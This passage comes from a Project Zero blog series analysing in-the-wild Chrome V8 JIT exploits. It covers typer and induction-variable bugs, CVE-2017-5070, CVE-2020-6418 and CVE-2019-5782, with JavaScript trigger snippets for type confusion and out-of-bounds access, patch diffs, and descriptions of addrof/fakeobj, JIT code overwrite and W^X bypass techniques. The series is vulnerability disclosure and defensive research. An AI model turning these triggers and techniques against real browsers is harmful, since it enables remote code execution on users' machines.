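    }
    if (++k > 10) {
      break;
    }
  }
  return { i, k };
}

// Rough stand-in for the first patch's test: does initial + increment give
// NaN for either extreme of the increment's type?
const initial = 0;
const patchSeesNaN = [-Infinity, +Infinity].some((inc) => Number.isNaN(initial + inc));

console.log(patchSeesNaN, runVariant()); // false { i: NaN, k: 2 }
```

Neither 0 + -Infinity nor 0 + +Infinity is NaN, yet the loop computes -Infinity + +Infinity on its second step, because i has already moved away from its initial value.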

Patch 2

The discovered variant was reported to Chrome in February along with the exploitation technique found in the exploit. This time the patch took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.


[...]
// If we do not have enough type information for the initial value or
// the increment, just return the initial value's type.
if (initial_type.IsNone() ||
    increment_type.Is(typer_->cache_->kSingletonZero)) {
  return initial_type;
}
// We only handle integer induction variables (otherwise ranges do not
// apply and we cannot do anything). Moreover, we don't support infinities
// in {increment_type} because the induction variable can become NaN
// through addition/subtraction of opposing infinities.
if (!initial_type.Is(typer_->cache_->kInteger) ||
    !increment_type.Is(typer_->cache_->kInteger) ||
    increment_type.Min() == -V8_INFINITY ||
    increment_type.Max() == +V8_INFINITY) {
[...]

Additionally, ReduceJSCreateArray was updated to always use the same value for both the length property and the backing store capacity, thus rendering the reported exploitation technique useless.

Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at the source code of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:

-0 + 0      // => 0 (the sign of zero is lost)
"30" - 0    // => 30 (a string becomes a number)
({}) + 0    // => "[object Object]0" (an object becomes a string)

As a result, the patched function provides us with an even wider choice of possible “type confusions”.

We considered it worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected, because we soon found this excellent blog post written by Jeremy Fetiveau, in which he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or the NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.

We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.

Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:

function trigger(arg) {
  // Initially:
  // actual = 1, inferred = any
  var k = 0;

  arg = arg | 0;
  // After step one:
  // actual = 1, inferred = [-0x80000000, 0x7fffffff]

  arg = Math.min(arg, 2);
  // After step two:
  // actual = 1, inferred = [-0x80000000, 2]

  arg = Math.max(arg, 1);
  // After step three:
  // actual = 1, inferred = [1, 2]

  if (arg == 1) {
    arg = "30";
  }
  // After step four:
  // actual = string{30}, inferred = [1, 2] or string{30}

  for (var i = arg; i < 0x1000; i -= 0) {
    if (++k > 1) {
      break;
    }
  }
  // After step five:
  // actual = number{30}, inferred = [1, 2] or string{30}

  i += 1;
  // After step six:
  // actual = 31, inferred = [2, 3]

  i >>= 1;
  // After step seven:
  // actual = 15, inferred = 1

  i += 2;
  // After step eight:
  // actual = 17, inferred = 3

  i >>= 1;
  // After step nine:
  // actual = 8, inferred = 1
  var array = [0.1, 0.1, 0.1, 0.1];
  return [array[i], array];
}

The mismatch between the number 30 and string “30” occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.
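The two columns of comments in the function can be replayed side by side. In this sketch ranges are `[min, max]` pairs, and the string part of the step-five type is dropped, mirroring how the typer treats SpeculativeSafeIntegerAdd; because addition and shifting are monotonic, applying each operation to both ends of a range gives the resulting range. The names are hypothetical.

```javascript
function replayTrigger() {
  let inferred = [1, 2]; // numeric part of the step-five type
  let actual = "30" - 0; // i -= 0 has turned the string into the number 30
  const steps = [
    (v) => v + 1,  // step six:   i += 1
    (v) => v >> 1, // step seven: i >>= 1
    (v) => v + 2,  // step eight: i += 2
    (v) => v >> 1, // step nine:  i >>= 1
  ];
  for (const step of steps) {
    inferred = inferred.map(step);
    actual = step(actual);
  }
  return { inferred, actual };
}

const { inferred, actual } = replayTrigger();
const arrayLength = 4; // var array = [0.1, 0.1, 0.1, 0.1];
// The typer concludes the index is at most 1, so the check looks redundant.
console.log(inferred, actual, inferred[1] < arrayLength, actual < arrayLength);
// [ 1, 1 ] 8 true false
```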

Patch 3

Soon after we had identified the regression, the V8 team landed a patch that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:

  • Extended element access hardening, which now prevents the abuse of NumberLessThan nodes.
  • Discovered and fixed a similar problem with the elimination of MaybeGrowFastElements. Under certain conditions, this node, which may resize the backing store of a given array, is placed before StoreElement to ensure the array can fit the element. Consequently, the elimination of the node could allow an attacker to write data past the end of the backing store.
  • Implemented a verifier for induction variables that validates the computed type against the more conservative regular phi typing.

Furthermore, the V8 engineers have been working on a feature that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.


This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and quite often even the slightest issue in the typer is enough to build a powerful and reliable exploit.

Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who has exploited a vulnerability in the class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 3: Chrome Exploits.

In-the-Wild Series: Chrome Exploits

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero


As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.

A timeline chart depicting the extracted exploits and affected browser versions.

All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine, and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still exploited in real-world attacks against web browsers, JIT vulnerabilities offer attackers many advantages. First, they usually provide more powerful primitives that can easily be turned into a reliable exploit without the need for a separate issue to, for example, break ASLR. Second, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.

The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.

1. CVE-2017-5070

The vulnerability

This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:

global_array = [, 1.1];

function trigger(local_array) {
  var temp = global_array[0];
  local_array[1] = {};
  return global_array[1];
}

trigger([, {}]);
trigger([, 1.1]);

for (var i = 0; i < 10000; i++) {
  trigger([, {}]);
}

trigger(global_array); // local_array and global_array are now the same object

The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.

The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.

The issue was reported to Chrome by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. The fix made the alias analyzer use the constant comparison only when both arguments are constants:

 HAliasing Query(HValue* a, HValue* b) {
   [...]
     // Constant objects can be distinguished statically.
-    if (a->IsConstant()) {
+    if (a->IsConstant() && b->IsConstant()) {
       return a->Equals(b) ? kMustAlias : kNoAlias;
     }
     return kMayAlias;
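The effect of the one-line fix can be illustrated with a toy model in JavaScript. It is not Crankshaft code: nodes are plain objects, a parameter's object is unknown at compile time, and `equals` stands in for HValue::Equals under the assumption that a constant never compares equal to a non-constant node.

```javascript
const MUST_ALIAS = "kMustAlias";
const NO_ALIAS = "kNoAlias";
const MAY_ALIAS = "kMayAlias";

// Stand-in for HValue::Equals: only two constants for the same object match.
function equals(a, b) {
  return a.isConstant && b.isConstant && a.object === b.object;
}

// Before the fix: only `a` had to be a constant.
function queryBeforeFix(a, b) {
  if (a.isConstant) {
    return equals(a, b) ? MUST_ALIAS : NO_ALIAS;
  }
  return MAY_ALIAS;
}

// After the fix: both nodes must be constants.
function queryAfterFix(a, b) {
  if (a.isConstant && b.isConstant) {
    return equals(a, b) ? MUST_ALIAS : NO_ALIAS;
  }
  return MAY_ALIAS;
}

const global_array = [, 1.1];
const globalNode = { isConstant: true, object: global_array };
// The local_array parameter: its object is unknown while compiling.
const localNode = { isConstant: false, object: undefined };

// trigger(global_array) makes both nodes refer to the same array at run time.
console.log(queryBeforeFix(globalNode, localNode)); // kNoAlias (unsound)
console.log(queryAfterFix(globalNode, localNode));  // kMayAlias
```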

Exploit 1

The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, covering a period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.

The author of the exploit takes a known approach to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.

The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.
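Generating a fresh function with eval might look like the sketch below. It is a hypothetical illustration of the idea, not the exploit's framework: each call evaluates new source text (the counter in the function name keeps the strings distinct), so every result is a separate function without optimized code, and the trigger-like body is only run in the interpreter here.

```javascript
const global_array = [, 1.1];
let generation = 0;

// Evaluates new source text on every call and returns the resulting function.
// The body mirrors the trigger function shown earlier; global_array is reached
// through the enclosing scope because this is a direct eval.
function freshTrigger() {
  generation++;
  return eval(
    "(function trigger_" + generation + "(local_array) {\n" +
    "  var temp = global_array[0];\n" +
    "  local_array[1] = {};\n" +
    "  return global_array[1];\n" +
    "})"
  );
}

const first = freshTrigger();
const second = freshTrigger();
console.log(first === second, first.name, second.name); // false trigger_1 trigger_2
console.log(first([, {}])); // 1.1
```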

The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.

However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.

Exploit 2

The second exploit for the same vulnerability targets Chrome 47-58, i.e., a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.

The general approach is similar; however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind, as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and is only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is using a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.

While it’s possible that the exploits were written after the issue had become public, they differ greatly from the public exploit in both design and implementation details. The attacker has thoroughly investigated the issue; for example, their trigger function is much more straightforward than the one in the public proof of concept.

2. CVE-2020-6418

The vulnerability

This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:

'use strict';

(function() {
  var popped;

  function trigger(new_target) {
    function inner(new_target) {
      function constructor() {
        popped = Array.prototype.pop.call(array);
      }
      var temp = array[0];
      return Reflect.construct(constructor, arguments, new_target);
    }

    inner(new_target);
  }

  var array = new Array(0, 0, 0, 0, 0);

  for (var i = 0; i < 20000; i++) {
    trigger(function() { });
    array.push(0);
  }

  var proxy = new Proxy(Object, {
    get: () => (array[4] = 1.1, Object.prototype)
  });

  trigger(proxy);
}());

A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable, meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.

Note that the attacker can’t simply call array.pop() directly: for that expression, the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.
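The side effect itself is ordinary JavaScript semantics and can be observed without any JIT involvement: when Reflect.construct creates the new object, it reads the prototype property of new_target, so a Proxy passed as new_target runs its get trap before the constructor body executes. The sketch below logs that order; `observeConstructSideEffect` and the log strings are hypothetical.

```javascript
// Shows that Reflect.construct consults new_target.prototype before the
// constructor body runs, giving a Proxy handler a chance to run code.
function observeConstructSideEffect() {
  const array = [0, 0, 0, 0, 0];
  const log = [];
  function constructor() {
    log.push("body: array[4] = " + array[4]);
  }
  const proxy = new Proxy(Object, {
    get(target, key, receiver) {
      log.push("trap: get " + String(key));
      if (key === "prototype") {
        array[4] = 1.1; // element kind changes in the middle of construction
      }
      return Reflect.get(target, key, receiver);
    },
  });
  const instance = Reflect.construct(constructor, [], proxy);
  return { log, array, instance };
}

const { log, array, instance } = observeConstructSideEffect();
console.log(log); // [ 'trap: get prototype', 'body: array[4] = 1.1' ]
console.log(Object.getPrototypeOf(instance) === Object.prototype); // true
```

In the exploit, the constructor body is where pop runs, so it already operates on the array after the handler has changed its element representation.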

This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was reported to Chrome under the 7-day deadline. The one-line patch modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:

InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(
  [...]
  InferReceiverMapsResult result = kReliableReceiverMaps;
  [...]
    case IrOpcode::kJSCreate: {
      if (IsSame(receiver, effect)) {
        base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);
        if (initial_map.has_value()) {
          *maps_return = ZoneHandleSet<Map>(initial_map->object());
          return result;
        }
        // We reached the allocation of the {receiver}.
        return kNoReceiverMaps;
      }
+     result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.
      break;
    }
  [...]

The reader can refer to the blog post published by Exodus Intel for more details on the issue and their version of the exploit.
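To make the bug class more concrete, here is a deliberately tiny C++ model of map inference; it is not V8's implementation. The effect chain is a hypothetical list of EffectNode values ordered from the use site backwards, and the `patched` flag switches between the vulnerable and the fixed handling of JSCreate. Apart from the three result values borrowed from the patch, every name is made up for illustration.

```cpp
#include <cassert>
#include <vector>

// Toy model only: Op, EffectNode and the functions are hypothetical.
enum class Op { kCheckMaps, kJSCreate, kOther };

enum InferReceiverMapsResult {
  kNoReceiverMaps,          // no map information found
  kReliableReceiverMaps,    // maps are guaranteed; no runtime check needed
  kUnreliableReceiverMaps,  // maps are only a hint; a runtime check is needed
};

struct EffectNode {
  Op op;
};

// Walks the effect chain from the use (e.g. the inlined pop) back towards the
// map check that established the receiver's maps.
InferReceiverMapsResult InferReceiverMaps(const std::vector<EffectNode>& chain,
                                          bool patched) {
  InferReceiverMapsResult result = kReliableReceiverMaps;
  for (const EffectNode& node : chain) {
    switch (node.op) {
      case Op::kCheckMaps:
        return result;  // found the maps; report how trustworthy they are
      case Op::kJSCreate:
        // Vulnerable: assumed to touch only the object it creates.
        // Patched: it may run user JS (e.g. a proxy trap on new_target).
        if (patched) result = kUnreliableReceiverMaps;
        break;
      case Op::kOther:
        // Conservatively treat any other effectful node as a possible map change.
        result = kUnreliableReceiverMaps;
        break;
    }
  }
  return kNoReceiverMaps;
}

// Only a reliable result lets the reducer skip the runtime map check.
bool NeedsRuntimeMapCheck(InferReceiverMapsResult r) {
  return r != kReliableReceiverMaps;
}
```

With an effect chain of JSCreate followed by the map check from `array[0]`, the unpatched model reports reliable maps, which is exactly the situation in which the optimizer drops the runtime check that would have caught the proxy-induced element transition.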

Exploit 1

This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.

The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.
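The fakeobj primitive, like the addrof primitive mentioned for Exploit 2, boils down to reading the same 64 bits through two different views. The sketch below, with hypothetical helper names, shows only that conversion: addrof reads a pointer out through the double view, and fakeobj writes a chosen word in through the double view so that code expecting tagged elements later treats it as a pointer. V8's tagging details, such as the low tag bit on heap object pointers, are deliberately left out.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Reinterprets a raw 64-bit word (e.g. a pointer) as the double a double array
// would store. memcpy avoids undefined behaviour from type punning.
double BitsToDouble(std::uint64_t bits) {
  double d;
  std::memcpy(&d, &bits, sizeof d);
  return d;
}

// Reinterprets a double element as the raw 64-bit word it occupies in memory.
std::uint64_t DoubleToBits(double d) {
  std::uint64_t bits;
  std::memcpy(&bits, &d, sizeof bits);
  return bits;
}
```

Pointer-like values map to tiny (subnormal) doubles, so the round trip must be done purely bitwise, as here, rather than through any floating-point arithmetic.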

The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive” garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private symbols, owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.
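The sketch below models why unchecked class positions leak data: a single std::string stands in for the V8 heap, the script source occupies a slice of it, and ClassBodyUnchecked trusts the start/end positions as the paragraph above describes. ToyHeap and both functions are hypothetical; std::string::substr still clamps to the whole buffer, so the toy itself stays memory-safe.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Toy model: `bytes` stands in for the heap, and the script source occupies
// [source_offset, source_offset + source_length) inside it.
struct ToyHeap {
  std::string bytes;
  std::size_t source_offset;
  std::size_t source_length;
};

// Mirrors the trust assumption: start/end are used as-is, with no check
// against source_length, so they can reach whatever follows the source.
std::string ClassBodyUnchecked(const ToyHeap& heap, std::size_t start, std::size_t end) {
  return heap.bytes.substr(heap.source_offset + start, end - start);
}

// What a bounds-checked version would do instead.
std::string ClassBodyChecked(const ToyHeap& heap, std::size_t start, std::size_t end) {
  if (start > end || end > heap.source_length) return {};
  return heap.bytes.substr(heap.source_offset + start, end - start);
}
```

For example, with the source "class A {}" followed by unrelated heap bytes, moving the end position past the source returns those bytes as part of the "class body".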

The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.

Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.

The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.

The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:

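jit_detector[Symbol.toPrimitive] = function() {
  var stack = (new Error).stack;
  // While Number is still a real call, it shows up as a "Number (" frame.
  if (stack.indexOf("Number (") == -1) {
    jit_detector.is_compiled = true;
  }
};

function trigger(array, proxy) {
  if (!jit_detector.is_compiled) {
    Number(jit_detector);  // invokes jit_detector[Symbol.toPrimitive]
  }
  [...]
}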

During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.

The exploit was broken in Chrome 64 by the change that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.

Exploit 2

After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, another commit landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:

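function trigger(new_target) {
  function inner(new_target) {
    // The JSCreate node now feeds an argument of array.pop(), so it is
    // scheduled after the map check for the pop property load.
    popped = array.pop(
        Reflect.construct(function() { }, arguments, new_target));
  }

  inner(new_target);
}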

By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.

The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.

The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.

This version targets Chrome 68-72. It was broken by the commit that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.

Exploit 3 & 4

The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.

Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant number of numeric and string literals were updated, and the pop call in the trigger function was replaced with a shift call. The actor likely made those changes in an attempt to avoid signature-based detection.

The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.

The public exploit presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the pointer compression feature. While Chrome still runs in 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.
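The size mismatch can be seen with a little arithmetic. This sketch ignores object headers, and it assumes, for illustration, that the optimized push computes the store offset with 8-byte double slots while the backing store actually holds 4-byte compressed tagged slots; the helper names are hypothetical.

```cpp
#include <cassert>
#include <cstddef>

constexpr std::size_t kDoubleSize = 8;
constexpr std::size_t kCompressedTaggedSize = 4;  // with pointer compression (Chrome 80+)
constexpr std::size_t kFullTaggedSize = 8;        // 64-bit build without compression

// Byte offset one past the end of element `index` if each element is `slot_size` bytes.
constexpr std::size_t ElementEnd(std::size_t index, std::size_t slot_size) {
  return (index + 1) * slot_size;
}

// True if storing element `index`, with the offset computed from `assumed_slot`,
// stays inside a backing store of `capacity` elements that are really
// `actual_slot` bytes each.
constexpr bool StoreInBounds(std::size_t index, std::size_t capacity,
                             std::size_t assumed_slot, std::size_t actual_slot) {
  return ElementEnd(index, assumed_slot) <= capacity * actual_slot;
}
```

Without pointer compression both element kinds are 8 bytes wide, so the computed offset matches the real layout, which is consistent with the approach only working on 64-bit systems from Chrome 80 onwards.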

3. CVE-2019-5782

The vulnerability

CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.

Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the previous post.

In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:

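oob_index = 100000;

function trigger() {
  let array = [1.1, 1.1];

  // The typer assumes arguments.length is in [0, 65534], so index is typed
  // as [-65534, 0] after the subtraction and as [0, 0] after Math.max.
  let index = arguments.length;
  index = index - 65534;
  index = Math.max(index, 0);

  return array[index] = 2.2;
}

for (let i = 0; i < 20000; i++) {
  trigger(1, 2, 3);  // warm-up with ordinary calls
}

print(trigger.apply(null, new Array(65534 + oob_index)));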
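The typer's reasoning can be replayed with a minimal interval type. Range, the helpers, and the constant are hypothetical simplifications rather than TurboFan's Typer; the point is only that [0, 65534] minus 65534, clamped by Math.max, collapses to [0, 0], which makes the bounds check on a two-element array look redundant.

```cpp
#include <algorithm>
#include <cassert>

// Minimal closed interval, loosely in the spirit of TurboFan range types.
struct Range {
  double min;
  double max;
};

constexpr double kTypedArgumentsLengthMax = 65534;  // the range quoted in the text

Range SubtractConstant(Range r, double k) { return {r.min - k, r.max - k}; }

// Type of Math.max(x, k) for x in [min, max].
Range MaxWithConstant(Range r, double k) {
  return {std::max(r.min, k), std::max(r.max, k)};
}

// A bounds check on array[index] looks redundant if every value in the
// range is a valid index for an array of this length.
bool BoundsCheckRedundant(Range index, double array_length) {
  return index.min >= 0 && index.max < array_length;
}
```

At runtime, however, `trigger.apply(null, new Array(65534 + oob_index))` makes arguments.length 165534, so the index is 100000 and the eliminated check would have failed.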

Qixun Zhao used the same vulnerability in Tianfu Cup and reported it to Chrome in November 2018. The public report includes a renderer exploit. The fix, which landed in Chrome 72, simply relaxed the range of the length property.

The exploit

The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.
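Precomputing inter-object offsets works because a linear (bump pointer) allocator places consecutive objects at predictable distances. This toy BumpAllocator is a hypothetical stand-in for V8's new space; the 8-byte alignment and the sizes in the example are arbitrary.

```cpp
#include <cassert>
#include <cstddef>
#include <optional>

// Toy linear allocator: each allocation starts where the previous one ended.
class BumpAllocator {
 public:
  explicit BumpAllocator(std::size_t capacity) : capacity_(capacity) {}

  // Returns the offset of the new object, or std::nullopt when the space is
  // exhausted (the point where a real engine would run a garbage collection).
  std::optional<std::size_t> Allocate(std::size_t size) {
    std::size_t aligned = (size + kAlignment - 1) & ~(kAlignment - 1);
    if (aligned > capacity_ - top_) return std::nullopt;
    std::size_t offset = top_;
    top_ += aligned;
    return offset;
  }

 private:
  static constexpr std::size_t kAlignment = 8;
  std::size_t capacity_;
  std::size_t top_ = 0;  // invariant: top_ <= capacity_
};
```

As long as nothing else allocates in between and no collection moves the objects, the distance between two allocations is fixed by their sizes alone, which is what lets an exploit hardcode it.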

Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.

As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that one of the hardening patches against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with site isolation; hence, the public exploit, which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.

The public and private exploits have little in common apart from the bug itself and BCE technique, which has been commonly known since at least 2017. The public exploit turns out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.

4. CVE-2019-13764

